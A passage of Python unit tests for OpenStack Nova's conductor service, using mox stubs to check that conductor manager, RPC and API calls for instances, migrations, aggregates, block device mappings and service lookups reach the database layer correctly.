type_id = flavors.get_flavor_by_name(type_name)['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = 'x86_64'
inst['os_type'] = 'Linux'
inst['availability_zone'] = 'fake-az'
inst.update(params)
return db.instance_create(self.context, inst)
def _do_update(self, instance_uuid, **updates):
return self.conductor.instance_update(self.context, instance_uuid,
updates)
def test_instance_update(self):
instance = self._create_fake_instance()
new_inst = self._do_update(instance['uuid'],
vm_state=vm_states.STOPPED)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.STOPPED)
self.assertEqual(new_inst['vm_state'], instance['vm_state'])
def test_action_event_start(self):
self.mox.StubOutWithMock(db, 'action_event_start')
db.action_event_start(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_start(self.context, {})
def test_action_event_finish(self):
self.mox.StubOutWithMock(db, 'action_event_finish')
db.action_event_finish(self.context, mox.IgnoreArg())
self.mox.ReplayAll()
self.conductor.action_event_finish(self.context, {})
def test_instance_update_invalid_key(self):
# NOTE(danms): the real DB API call ignores invalid keys
if self.db is None:
self.stub_out_client_exceptions()
self.assertRaises(KeyError,
self._do_update, 'any-uuid', foobar=1)
def test_migration_get(self):
migration = db.migration_create(self.context.elevated(),
{'instance_uuid': 'fake-uuid',
'status': 'migrating'})
self.assertEqual(jsonutils.to_primitive(migration),
self.conductor.migration_get(self.context,
migration['id']))
def test_migration_get_unconfirmed_by_dest_compute(self):
self.mox.StubOutWithMock(db,
'migration_get_unconfirmed_by_dest_compute')
db.migration_get_unconfirmed_by_dest_compute(self.context,
'fake-window',
'fake-host')
self.mox.ReplayAll()
self.conductor.migration_get_unconfirmed_by_dest_compute(self.context,
'fake-window',
'fake-host')
def test_migration_get_in_progress_by_host_and_node(self):
self.mox.StubOutWithMock(db,
'migration_get_in_progress_by_host_and_node')
db.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node').AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node')
self.assertEqual(result, 'fake-result')
def test_migration_create(self):
inst = {'uuid': 'fake-uuid',
'host': 'fake-host',
'node': 'fake-node'}
self.mox.StubOutWithMock(db, 'migration_create')
db.migration_create(self.context.elevated(),
{'instance_uuid': inst['uuid'],
'source_compute': inst['host'],
'source_node': inst['node'],
'fake-key': 'fake-value'}).AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.migration_create(self.context, inst,
{'fake-key': 'fake-value'})
self.assertEqual(result, 'result')
def test_migration_update(self):
migration = db.migration_create(self.context.elevated(),
{'instance_uuid': 'fake-uuid',
'status': 'migrating'})
migration_p = jsonutils.to_primitive(migration)
migration = self.conductor.migration_update(self.context, migration_p,
'finished')
self.assertEqual(migration['status'], 'finished')
def test_instance_get_by_uuid(self):
orig_instance = self._create_fake_instance()
copy_instance = self.conductor.instance_get_by_uuid(
self.context, orig_instance['uuid'])
self.assertEqual(orig_instance['name'],
copy_instance['name'])
def _setup_aggregate_with_host(self):
aggregate_ref = db.aggregate_create(self.context.elevated(),
{'name': 'foo'}, metadata={'availability_zone': 'foo'})
self.conductor.aggregate_host_add(self.context, aggregate_ref, 'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
return aggregate_ref
def test_aggregate_host_add(self):
aggregate_ref = self._setup_aggregate_with_host()
self.assertTrue(any([host == 'bar'
for host in aggregate_ref['hosts']]))
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_host_delete(self):
aggregate_ref = self._setup_aggregate_with_host()
self.conductor.aggregate_host_delete(self.context, aggregate_ref,
'bar')
aggregate_ref = db.aggregate_get(self.context.elevated(),
aggregate_ref['id'])
self.assertFalse(any([host == 'bar'
for host in aggregate_ref['hosts']]))
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_get(self):
aggregate_ref = self._setup_aggregate_with_host()
aggregate = self.conductor.aggregate_get(self.context,
aggregate_ref['id'])
self.assertEqual(jsonutils.to_primitive(aggregate_ref), aggregate)
db.aggregate_delete(self.context.elevated(), aggregate_ref['id'])
def test_aggregate_get_by_host(self):
self._setup_aggregate_with_host()
aggregates = self.conductor.aggregate_get_by_host(self.context, 'bar')
self.assertEqual(aggregates[0]['availability_zone'], 'foo')
def test_aggregate_metadata_add(self):
aggregate = {'name': 'fake aggregate', 'id': 'fake-id'}
metadata = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'aggregate_metadata_add')
db.aggregate_metadata_add(
mox.IgnoreArg(), aggregate['id'], metadata, False).AndReturn(
metadata)
self.mox.ReplayAll()
result = self.conductor.aggregate_metadata_add(self.context,
aggregate,
metadata)
self.assertEqual(result, metadata)
def test_aggregate_metadata_delete(self):
aggregate = {'name': 'fake aggregate', 'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'aggregate_metadata_delete')
db.aggregate_metadata_delete(mox.IgnoreArg(), aggregate['id'], 'fake')
self.mox.ReplayAll()
self.conductor.aggregate_metadata_delete(self.context, aggregate,
'fake')
def test_aggregate_metadata_get_by_host(self):
self.mox.StubOutWithMock(db, 'aggregate_metadata_get_by_host')
db.aggregate_metadata_get_by_host(self.context, 'host',
'key').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.aggregate_metadata_get_by_host(self.context,
'host', 'key')
self.assertEqual(result, 'result')
def test_bw_usage_update(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
update_args = (self.context, 'uuid', 'mac', 0, 10, 20, 5, 10, 20)
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_update(*update_args, update_cells=True)
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_update(*update_args)
self.assertEqual(result, 'foo')
def test_security_group_get_by_instance(self):
fake_instance = {'uuid': 'fake-instance'}
self.mox.StubOutWithMock(db, 'security_group_get_by_instance')
db.security_group_get_by_instance(
self.context, fake_instance['uuid']).AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.security_group_get_by_instance(self.context,
fake_instance)
self.assertEqual(result, 'it worked')
def test_security_group_rule_get_by_security_group(self):
fake_secgroup = {'id': 'fake-secgroup'}
self.mox.StubOutWithMock(db,
'security_group_rule_get_by_security_group')
db.security_group_rule_get_by_security_group(
self.context, fake_secgroup['id']).AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.security_group_rule_get_by_security_group(
self.context, fake_secgroup)
self.assertEqual(result, 'it worked')
def test_provider_fw_rule_get_all(self):
fake_rules = ['a', 'b', 'c']
self.mox.StubOutWithMock(db, 'provider_fw_rule_get_all')
db.provider_fw_rule_get_all(self.context).AndReturn(fake_rules)
self.mox.ReplayAll()
result = self.conductor.provider_fw_rule_get_all(self.context)
self.assertEqual(result, fake_rules)
def test_agent_build_get_by_triple(self):
self.mox.StubOutWithMock(db, 'agent_build_get_by_triple')
db.agent_build_get_by_triple(self.context, 'fake-hv', 'fake-os',
'fake-arch').AndReturn('it worked')
self.mox.ReplayAll()
result = self.conductor.agent_build_get_by_triple(self.context,
'fake-hv',
'fake-os',
'fake-arch')
self.assertEqual(result, 'it worked')
def test_block_device_mapping_get_all_by_instance(self):
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db,
'block_device_mapping_get_all_by_instance')
db.block_device_mapping_get_all_by_instance(
self.context, fake_inst['uuid']).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.block_device_mapping_get_all_by_instance(
self.context, fake_inst, legacy=False)
self.assertEqual(result, 'fake-result')
def test_instance_get_active_by_window_joined(self):
self.mox.StubOutWithMock(db, 'instance_get_active_by_window_joined')
db.instance_get_active_by_window_joined(self.context, 'fake-begin',
'fake-end', 'fake-proj',
'fake-host')
self.mox.ReplayAll()
self.conductor.instance_get_active_by_window_joined(
self.context, 'fake-begin', 'fake-end', 'fake-proj', 'fake-host')
def test_instance_destroy(self):
self.mox.StubOutWithMock(db, 'instance_destroy')
db.instance_destroy(self.context, 'fake-uuid')
self.mox.ReplayAll()
self.conductor.instance_destroy(self.context, {'uuid': 'fake-uuid'})
def test_instance_info_cache_delete(self):
self.mox.StubOutWithMock(db, 'instance_info_cache_delete')
db.instance_info_cache_delete(self.context, 'fake-uuid')
self.mox.ReplayAll()
self.conductor.instance_info_cache_delete(self.context,
{'uuid': 'fake-uuid'})
def test_instance_info_cache_update(self):
fake_values = {'key1': 'val1', 'key2': 'val2'}
fake_instance = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db, 'instance_info_cache_update')
db.instance_info_cache_update(self.context, 'fake-uuid',
fake_values)
self.mox.ReplayAll()
self.conductor.instance_info_cache_update(self.context,
fake_instance,
fake_values)
def test_flavor_get(self):
self.mox.StubOutWithMock(db, 'flavor_get')
db.flavor_get(self.context, 'fake-id').AndReturn('fake-type')
self.mox.ReplayAll()
result = self.conductor.instance_type_get(self.context, 'fake-id')
self.assertEqual(result, 'fake-type')
def test_vol_get_usage_by_time(self):
self.mox.StubOutWithMock(db, 'vol_get_usage_by_time')
db.vol_get_usage_by_time(self.context, 'fake-time').AndReturn(
'fake-usage')
self.mox.ReplayAll()
result = self.conductor.vol_get_usage_by_time(self.context,
'fake-time')
self.assertEqual(result, 'fake-usage')
def test_vol_usage_update(self):
self.mox.StubOutWithMock(db, 'vol_usage_update')
self.mox.StubOutWithMock(test_notifier, 'notify')
self.mox.StubOutWithMock(compute_utils, 'usage_volume_info')
fake_inst = {'uuid': 'fake-uuid',
'project_id': 'fake-project',
'user_id': 'fake-user',
'availability_zone': 'fake-az',
}
db.vol_usage_update(self.context, 'fake-vol', 22, 33, 44, 55,
fake_inst['uuid'],
fake_inst['project_id'],
fake_inst['user_id'],
fake_inst['availability_zone'],
False).AndReturn('fake-usage')
compute_utils.usage_volume_info('fake-usage').AndReturn('fake-info')
notifier_api.notify(self.context,
'conductor.%s' % self.conductor_manager.host,
'volume.usage', notifier_api.INFO,
'fake-info')
self.mox.ReplayAll()
self.conductor.vol_usage_update(self.context, 'fake-vol',
22, 33, 44, 55, fake_inst,
'fake-update-time', False)
def test_compute_node_create(self):
self.mox.StubOutWithMock(db, 'compute_node_create')
db.compute_node_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_compute_node_update(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_update')
db.compute_node_update(self.context, node['id'], 'fake-values',
False).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_update(self.context, node,
'fake-values', False)
self.assertEqual(result, 'fake-result')
def test_compute_node_delete(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_delete')
db.compute_node_delete(self.context, node['id']).AndReturn(None)
self.mox.ReplayAll()
result = self.conductor.compute_node_delete(self.context, node)
self.assertEqual(result, None)
def test_instance_fault_create(self):
self.mox.StubOutWithMock(db, 'instance_fault_create')
db.instance_fault_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_fault_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_task_log_get(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end', 'host',
'state').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host', 'state')
self.assertEqual(result, 'result')
def test_task_log_get_with_no_state(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end',
'host', None).AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host')
self.assertEqual(result, 'result')
def test_task_log_begin_task(self):
self.mox.StubOutWithMock(db, 'task_log_begin_task')
db.task_log_begin_task(self.context.elevated(), 'task', 'begin',
'end', 'host', 'items',
'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_begin_task(
self.context, 'task', 'begin', 'end', 'host', 'items', 'message')
self.assertEqual(result, 'result')
def test_task_log_end_task(self):
self.mox.StubOutWithMock(db, 'task_log_end_task')
db.task_log_end_task(self.context.elevated(), 'task', 'begin', 'end',
'host', 'errors', 'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_end_task(
self.context, 'task', 'begin', 'end', 'host', 'errors', 'message')
self.assertEqual(result, 'result')
def test_notify_usage_exists(self):
info = {
'audit_period_beginning': 'start',
'audit_period_ending': 'end',
'bandwidth': 'bw_usage',
'image_meta': {},
'extra': 'info',
}
instance = {
'system_metadata': [],
}
self.mox.StubOutWithMock(notifications, 'audit_period_bounds')
self.mox.StubOutWithMock(notifications, 'bandwidth_usage')
self.mox.StubOutWithMock(compute_utils, 'notify_about_instance_usage')
notifications.audit_period_bounds(False).AndReturn(('start', 'end'))
notifications.bandwidth_usage(instance, 'start', True).AndReturn(
'bw_usage')
compute_utils.notify_about_instance_usage(self.context, instance,
'exists',
system_metadata={},
extra_usage_info=info)
self.mox.ReplayAll()
self.conductor.notify_usage_exists(self.context, instance,
system_metadata={},
extra_usage_info=dict(extra='info'))
def test_security_groups_trigger_members_refresh(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_members_refresh')
self.conductor_manager.security_group_api.trigger_members_refresh(
self.context, [1, 2, 3])
self.mox.ReplayAll()
self.conductor.security_groups_trigger_members_refresh(self.context,
[1, 2, 3])
def test_network_migrate_instance_start(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_start')
self.conductor_manager.network_api.migrate_instance_start(self.context,
'instance',
'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_start(self.context,
'instance',
'migration')
def test_network_migrate_instance_finish(self):
self.mox.StubOutWithMock(self.conductor_manager.network_api,
'migrate_instance_finish')
self.conductor_manager.network_api.migrate_instance_finish(
self.context, 'instance', 'migration')
self.mox.ReplayAll()
self.conductor.network_migrate_instance_finish(self.context,
'instance',
'migration')
def test_quota_commit(self):
self.mox.StubOutWithMock(quota.QUOTAS, 'commit')
quota.QUOTAS.commit(self.context, 'reservations', project_id=None)
quota.QUOTAS.commit(self.context, 'reservations', project_id='proj')
self.mox.ReplayAll()
self.conductor.quota_commit(self.context, 'reservations')
self.conductor.quota_commit(self.context, 'reservations', 'proj')
def test_quota_rollback(self):
self.mox.StubOutWithMock(quota.QUOTAS, 'rollback')
quota.QUOTAS.rollback(self.context, 'reservations', project_id=None)
quota.QUOTAS.rollback(self.context, 'reservations', project_id='proj')
self.mox.ReplayAll()
self.conductor.quota_rollback(self.context, 'reservations')
self.conductor.quota_rollback(self.context, 'reservations', 'proj')
def test_get_ec2_ids(self):
expected = {
'instance-id': 'ec2-inst-id',
'ami-id': 'ec2-ami-id',
'kernel-id': 'ami-kernel-ec2-kernelid',
'ramdisk-id': 'ami-ramdisk-ec2-ramdiskid',
}
inst = {
'uuid': 'fake-uuid',
'kernel_id': 'ec2-kernelid',
'ramdisk_id': 'ec2-ramdiskid',
'image_ref': 'fake-image',
}
self.mox.StubOutWithMock(ec2utils, 'id_to_ec2_inst_id')
self.mox.StubOutWithMock(ec2utils, 'glance_id_to_ec2_id')
self.mox.StubOutWithMock(ec2utils, 'image_type')
ec2utils.id_to_ec2_inst_id(inst['uuid']).AndReturn(
expected['instance-id'])
ec2utils.glance_id_to_ec2_id(self.context,
inst['image_ref']).AndReturn(
expected['ami-id'])
for image_type in ['kernel', 'ramdisk']:
image_id = inst['%s_id' % image_type]
ec2utils.image_type(image_type).AndReturn('ami-' + image_type)
ec2utils.glance_id_to_ec2_id(self.context, image_id,
'ami-' + image_type).AndReturn(
'ami-%s-ec2-%sid' % (image_type, image_type))
self.mox.ReplayAll()
result = self.conductor.get_ec2_ids(self.context, inst)
self.assertEqual(result, expected)
def test_compute_stop(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api, 'stop')
self.conductor_manager.compute_api.stop(self.context, 'instance', True)
self.mox.ReplayAll()
self.conductor.compute_stop(self.context, 'instance')
def test_compute_confirm_resize(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'confirm_resize')
self.conductor_manager.compute_api.confirm_resize(self.context,
'instance',
'migration')
self.mox.ReplayAll()
self.conductor.compute_confirm_resize(self.context, 'instance',
'migration')
def test_compute_unrescue(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'unrescue')
self.conductor_manager.compute_api.unrescue(self.context, 'instance')
self.mox.ReplayAll()
self.conductor.compute_unrescue(self.context, 'instance')
def test_compute_reboot(self):
self.mox.StubOutWithMock(self.conductor_manager.compute_api, 'reboot')
self.conductor_manager.compute_api.reboot(self.context, 'instance',
'fake-type')
self.mox.ReplayAll()
self.conductor.compute_reboot(self.context, 'instance', 'fake-type')
class ConductorTestCase(_BaseTestCase, test.TestCase):
"""Conductor Manager Tests."""
def setUp(self):
super(ConductorTestCase, self).setUp()
self.conductor = conductor_manager.ConductorManager()
self.conductor_manager = self.conductor
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 'fake-id', 'device_name': 'foo'}
fake_bdm2 = {'id': 'fake-id', 'device_name': 'foo2'}
cells_rpcapi = self.conductor.cells_rpcapi
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(cells_rpcapi,
'bdm_update_or_create_at_top')
db.block_device_mapping_create(self.context,
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(self.context, fake_bdm2,
create=True)
db.block_device_mapping_update(self.context, fake_bdm['id'],
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(self.context,
fake_bdm2,
create=False)
db.block_device_mapping_update_or_create(
self.context, fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(self.context,
fake_bdm2,
create=None)
self.mox.ReplayAll()
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm)
def test_block_device_mapping_destroy(self):
fake_bdm = {'id': 'fake-bdm',
'instance_uuid': 'fake-uuid',
'device_name': 'fake-device1',
'volume_id': 'fake-vol-id1'}
fake_bdm2 = {'id': 'fake-bdm-2',
'instance_uuid': 'fake-uuid2',
'device_name': '',
'volume_id': 'fake-vol-id2'}
fake_inst = {'uuid': 'fake-uuid'}
cells_rpcapi = self.conductor.cells_rpcapi
self.mox.StubOutWithMock(db, 'block_device_mapping_destroy')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_volume')
self.mox.StubOutWithMock(cells_rpcapi, 'bdm_destroy_at_top')
db.block_device_mapping_destroy(self.context, 'fake-bdm')
cells_rpcapi.bdm_destroy_at_top(self.context,
fake_bdm['instance_uuid'],
device_name=fake_bdm['device_name'])
db.block_device_mapping_destroy(self.context, 'fake-bdm-2')
cells_rpcapi.bdm_destroy_at_top(self.context,
fake_bdm2['instance_uuid'],
volume_id=fake_bdm2['volume_id'])
db.block_device_mapping_destroy_by_instance_and_device(self.context,
'fake-uuid',
'fake-device')
cells_rpcapi.bdm_destroy_at_top(self.context, fake_inst['uuid'],
device_name='fake-device')
db.block_device_mapping_destroy_by_instance_and_volume(self.context,
'fake-uuid',
'fake-volume')
cells_rpcapi.bdm_destroy_at_top(self.context, fake_inst['uuid'],
volume_id='fake-volume')
self.mox.ReplayAll()
self.conductor.block_device_mapping_destroy(self.context,
[fake_bdm,
fake_bdm2])
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
device_name='fake-device')
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
volume_id='fake-volume')
def test_instance_get_all_by_filters(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort')
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(),
'host', None).AndReturn('result')
db.instance_get_all_by_host_and_node(self.context.elevated(), 'host',
'node').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context, 'host')
self.assertEqual(result, 'result')
result = self.conductor.instance_get_all_by_host(self.context, 'host',
'node')
self.assertEqual(result, 'result')
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(rpc_common.ClientException,
self.conductor.service_get_all_by,
self.context, **condargs)
self.stub_out_client_exceptions()
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (), {})
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host'))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic'))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host'))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'args')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['args'])
def test_compute_stop_with_objects(self):
# use an instance object rather than a dict
instance = self._create_fake_instance()
inst_obj = instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), instance)
self.mox.StubOutWithMock(self.conductor_manager.compute_api, 'stop')
self.conductor_manager.compute_api.stop(self.context, inst_obj, True)
self.mox.ReplayAll()
self.conductor.compute_stop(self.context, inst_obj)
def test_compute_confirm_resize_with_objects(self):
# use an instance object rather than a dict
instance = self._create_fake_instance()
inst_obj = instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), instance)
self.mox.StubOutWithMock(self.conductor_manager.compute_api,
'confirm_resize')
# make sure the instance object is serialized
primitive_instance = dict(inst_obj.items())
self.conductor_manager.compute_api.confirm_resize(
self.context, primitive_instance, 'migration')
self.mox.ReplayAll()
self.conductor.compute_confirm_resize(self.context, inst_obj,
'migration')
class ConductorRPCAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor RPC API Tests."""
def setUp(self):
super(ConductorRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor_manager = self.conductor_service.manager
self.conductor = conductor_rpcapi.ConductorAPI()
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
db.block_device_mapping_create(self.context, fake_bdm)
db.block_device_mapping_update(self.context, fake_bdm['id'], fake_bdm)
db.block_device_mapping_update_or_create(self.context, fake_bdm)
self.mox.ReplayAll()
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm)
def test_block_device_mapping_destroy(self):
fake_bdm = {'id': 'fake-bdm',
'instance_uuid': 'fake-uuid',
'device_name': 'fake-device1',
'volume_id': 'fake-vol-id1'}
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db, 'block_device_mapping_destroy')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_volume')
db.block_device_mapping_destroy(self.context, 'fake-bdm')
db.block_device_mapping_destroy_by_instance_and_device(self.context,
'fake-uuid',
'fake-device')
db.block_device_mapping_destroy_by_instance_and_volume(self.context,
'fake-uuid',
'fake-volume')
self.mox.ReplayAll()
self.conductor.block_device_mapping_destroy(self.context,
bdms=[fake_bdm])
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
device_name='fake-device')
self.conductor.block_device_mapping_destroy(self.context,
instance=fake_inst,
volume_id='fake-volume')
def test_instance_get_all_by_filters(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort')
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (), {})
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host'))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic'))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host'))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host'),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary'),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['arg'])
class ConductorAPITestCase(_BaseTestCase, test.TestCase):
"""Conductor API Tests."""
def setUp(self):
super(ConductorAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.API()
self.conductor_manager = self.conductor_service.manager
self.db = None
def _do_update(self, instance_uuid, **updates):
# NOTE(danms): the public API takes actual keyword arguments,
# so override the base class here to make the call correctly
return self.conductor.instance_update(self.context, instance_uuid,
**updates)
def test_bw_usage_get(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_get(*get_args)
self.assertEqual(result, 'foo')
def test_block_device_mapping_update_or_create(self):
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
db.block_device_mapping_create(self.context, 'fake-bdm')
db.block_device_mapping_update(self.context,
'fake-id', {'id': 'fake-id'})
db.block_device_mapping_update_or_create(self.context, 'fake-bdm')
self.mox.ReplayAll()
self.conductor.block_device_mapping_create(self.context, 'fake-bdm')
self.conductor.block_device_mapping_update(self.context, 'fake-id', {})
self.conductor.block_device_mapping_update_or_create(self.context,
'fake-bdm')
def test_block_device_mapping_destroy(self):
fake_bdm = {'id': 'fake-bdm',
'instance_uuid': 'fake-uuid',
'device_name': 'fake-device1',
'volume_id': 'fake-vol-id1'}
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db, 'block_device_mapping_destroy')
